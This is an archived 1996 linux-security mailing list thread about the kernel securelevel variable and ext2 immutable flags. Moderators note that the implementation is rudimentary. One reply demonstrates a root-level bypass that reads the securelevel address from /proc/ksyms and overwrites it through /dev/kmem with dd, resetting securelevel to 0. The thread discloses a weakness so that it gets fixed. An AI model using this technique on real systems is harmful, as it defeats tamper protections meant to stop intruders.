has anyone played with the securelevel variable in the kernel and the immutable flags in the ext2 file system? The only way I have found to change the flag is by patching sched.c from int securelevel=0 to int securelevel=1 The sysctrl code seems to allow the setting of the flag only by init (PID=1) and only upwards (0->1, etc). The problem is that I haven''t found a way to get init to set the securelevel variable. Is securelevel used in the Linux community? [ Mod: If you have a look at securelevel code you can see that at this moment the only process that can change securelevel is init. From what I gather, even though the basic support for securelevel is already in kernel, it is so basic that nothing can be done in a stock kernel. Someone also was working on a project of bringing POSIX.6 privs to linux but the last patch that I have seen was against 2.0 kernel. Those who are interested in merging two patches should have a look at http://www.xarius.demon.co.uk/software/posix6/ -- alex ]
Tronicek Zdenek student 6_96_97 k336
1996-Nov-20 09:58 UTC
Re: [linux-security] Chattr +i and securelevel
> > has anyone played with the securelevel variable in the kernel and the > immutable flags in the ext2 file system? > > The only way I have found to change the flag is by > patching sched.c from > > int securelevel=0 > to int securelevel=1 > > The sysctrl code seems to allow the setting of the flag > only by init (PID=1) and only upwards (0->1, etc). > The problem is that I haven''t found a way to get > init to set the securelevel variable. > Is securelevel used in the Linux community? >Once you are root, you can change securelevel this way: (0x001a8f64 == 1740644) # cat /proc/sys/kernel/securelevel 1 # cat /proc/ksyms | grep securelevel 001a8f64 securelevel # dd if=/dev/zero of=/dev/kmem seek=1740644 bs=1 count=1 1+0 records in 1+0 records out # cat /proc/sys/kernel/securelevel 0 # And now you are the king of machine :) Zdenek Tronicek, CTU Prague [mod: Yes. the "securelevel" implementation is VERY preliminary. A college student would need about 1-8 hours to get to the point that this and many other methods wouldn''t work anymore. In short: Someone, get out of your bed and DO IT! -- REW.] From mail@mail.redhat.com Wed Nov 20 21:12:26 1996